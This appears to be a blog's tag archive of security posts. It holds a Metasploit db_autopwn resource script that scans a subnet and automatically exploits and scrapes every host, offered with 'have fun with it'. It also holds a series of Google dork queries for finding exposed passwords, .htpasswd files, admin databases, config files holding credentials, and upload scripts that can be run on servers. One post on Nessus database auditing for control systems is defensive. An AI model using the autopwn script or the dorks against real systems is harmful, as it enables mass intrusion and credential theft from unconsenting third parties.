All Entries Tagged With: "database"
A db_autopwn script run from msfconsole
Here’s a handy script I found on the web, written by HD Moore himself. It works like a charm!
$ vim ownitall.rc
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r
$ msfconsole -r ownitall.rc
Have fun with it.
Database Auditing for Control System Applications
Author: Jason Holcomb
Whether it’s for real-time, historical, or some other purpose, there are databases of all shapes and sizes in control systems. Two questions regarding these databases:
1.) How do we verify that they are in a secure state?
2.) Can we learn or measure anything about the application security from the data inside them?
Tenable added database audit capability to Nessus earlier this year and I recently had the opportunity to further explore the new feature. The Database Compliance Checks plugin is in the same family as the the Windows and Unix compliance plugins. The difference is that instead of authenticating to the OS, it authenticates to the database. From there it can call built-in database functions and run SQL.
So to answer question 1, Tenable provides audit files based on the CIS Benchmarks for Oracle, SQL Server, and MySQL. I tested on Oracle and MySQL and found that – no surprise here – there are many settings that can be improved upon from the default install. The Oracle audit file checks around 50 different configuration items. They range from simple password policy to more database-centric security settings such as the default tablespace for user accounts and restricting critical table access to the DBA and SYS accounts. These benchmarks are a good starting point for checking database security.
For question 2, let’s look at a simple example of a control system application setting in a database that we can audit. Say we want to verify that an operator audit trail is enabled for our HMIs. We know there is a setting in the GUI that dictates audit logging and that the value is stored in a database. The setting allows for different levels of audit logging but we want to just verify that is it not disabled.
The first step will be to identify the table and test an SQL query to pull back the information we want to evaluate. We find the value in the t_hmi_cfg table and use this query:
select cfgvalue from T_HMI_CFG where cfgname like ‘audit-trail’;
The query brings back the value ‘1′. Through a series of changing the value in the GUI and running this query, we learn that the value is ‘0′ when audit logging is disabled. We can then write a Nessus database audit check to verify that the value is set to something other than ‘0′. Here is the audit check:
<custom_item>
type : SQL_POLICY
description : “Verify that the audit trail is enabled for operators.”
sql_request : “select cfgvalue from T_HMI_CFG where cfgname like ‘audit-trail’;”
sql_types : POLICY_VARCHAR
sql_expect : regex: “[^0]”
</custom_item>
This a simplistic example but hopefully illustrates the power of being able to audit values in a database. For systems with the right architecture, this opens up a whole new world of configuration auditing which gives the asset owner even more assurance and insight into the security of their SCADA or DCS applications. The Nessus report looks exactly like any other Bandolier/Policy Compliance report:
Since database auditing wasn’t available when we started the project, you will not find it in the current Bandolier audit files. I suspect this will change as we develop audit files for new applications and update the files for the existing set. Database auditing won’t apply to every application but for those where it is applicable, the security auditing capability will be greatly enhanced.
“http://*:*@www” domainname or “http://*:*@www” bob:bob
Here they are linked for instant gratification, and using a domain no-one cares about:
These are queries to get inline passwords from search engines (not just Google), you have to type in the query followed with the domain name without the .com or .net.
Normally you would type “http://*:*@www” domainname or “http://*:*@www” bob:bob into Google, but I’ve linked the query above for instant gratification – remember this is just one of many ways to use google to search. I didn’t form these queries I merely searched the web for ‘answers’, and used queries from googles advanced search operators page. You can add to, modify, substitute at will – it’s a free country – but be careful!
As always. these posts are educational and should not be used for pwning or any such unethical ’stuff’.
“index of /” ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
Here’s a method of searching for scripts that let you upload files, which you can then execute on the server.
“index of /” ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl )
Normally you would type “index of /” ( upload.cfm | upload.asp | upload.php | upload.cgi | upload.jsp | upload.pl ) into Google, but I’ve linked the query above for instant gratification, but remember this is just one of many ways to use google to search. I didn’t form these queries I merely searched the web for ‘answers’, and used queries from googles advanced search operators page. You can add to, modify, substitute at will – it’s a free country!
As always. these posts are educational and should not be used for pwning or any such unethical ’stuff’
intitle:”Index of” “.htpasswd” “htgroup” -intitle:”dist” -apache -htpasswd.c
Here’s another method of finding password information, more so from apache centric servers.
intitle:”Index of” “.htpasswd” “htgroup” -intitle:”dist” -apache -htpasswd.c
Normally you would type “intitle:”Index of” “.htpasswd” “htgroup” -intitle:”dist” -apache -htpasswd.c” into Google, but I’ve linked the query above for instant gratification, but remember this is just one of many ways to use google to search. I didn’t form these queries I merely searched the web for ‘answers’, and used queries from googles advanced search operators page.
As always. these posts are educational and should not be used for pwning or any such unethical ’stuff’.
allinurl: admin mdb
Not all of these pages are administrator’s access databases containing usernames, passwords and other sensitive information, but many are, and there’s other useful information too.
Normally you would type allinurl: admin mdb into Google, but I’ve linked the query above for instant gratification, but remember this is just one of many ways to use google to search. I didn’t form these queries I merely searched the web for ‘answers’, and used queries from googles advanced search operators page.
As always. these posts are educational and should not be used for pwning or any such unethical ’stuff’.
filetype:config config intext:appSettings “User ID”
These files generally contain configuration information for a .Net web application, information such as connection strings to databases file directories and more. On a properly setup IIS these files are normally not served to the public, normally being the operative word.
filetype:config config intext:appSettings “User ID”
Normally you would type filetype:config config intext:appSettings “User ID” into Google, but I’ve linked the query above for instant gratification, but remember this is just one of many ways to use google to search. I didn’t form these queries I merely searched the web for ‘answers’, and used queries from googles advanced search operators page.
As always. these posts are educational and should not be used for pwning or any such unethical ’stuff’.
intitle:”Index of” pwd.db
This one speaks for itself. As has been said on the various hacking places around the web it’s all well and good putting in security but, if you don’t protect your security (think about it) then what is the point, right?
By now you should be seeing how these search queries are formed. You don’t have to hunt the web for these – you can go to googles ‘advanced google search operators‘ page and start learning how to create your own.
As always. these posts are educational and should not be used for pwning or any such unethical ’stuff’.
